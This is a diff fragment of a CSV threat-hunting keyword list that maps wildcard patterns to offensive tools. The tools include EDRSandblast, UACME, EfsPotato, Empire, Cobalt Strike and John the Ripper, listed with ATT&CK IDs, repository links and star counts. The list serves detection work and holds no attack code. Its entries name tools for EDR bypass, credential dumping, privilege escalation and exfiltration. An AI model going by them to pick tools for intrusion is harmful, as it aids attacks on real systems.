drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_LsassDump.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_StaticLibrary*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast-GodFault*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast-GodFault*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast-master*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*EEC35BCF-E990-4260-828D-2B4F9AC97269*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*eeriedusk/nysm*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*eeriedusk/nysm*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*EfsPotato-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*EfsPotato*efsrpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" "*EfsPotato*lsarpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" @@ -9780,7 +9929,7 @@ "*EfsPotato*samr*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" "*EfsPotato-main*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" "*EgeBalci/amber@latest*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*EggShell.py*","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1562","404","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z" +"*EggShell.py*","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1563","404","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z" "*Egress-Assess Exfil Data*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email subject","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess Report*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess transfer share*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" @@ -9789,20 +9938,20 @@ "*EgressAssess.ps1*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess-master*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*egressbuster*","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","4","327","104","2021-02-17T00:54:07Z","2015-05-14T02:19:26Z" -"*egresscheck-framework*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ejabberd2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*egresscheck-framework*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ejabberd2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*eldraco/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" -"*electrum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*electrum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*elevate juicypotato *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*elevate Printspoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*elevate svc-exe *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*ElevatePrivs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*elevationstation.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*elevationstation.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*elevationstation.git*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*elevationstation.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*elevationstation-main*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*ElevenPaths*FOCA*","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2495","519","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z" +"*ElevatePrivs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*elevationstation.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.git*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation-main*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*ElevenPaths*FOCA*","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2495","518","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z" "*ELFLoader.c*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" 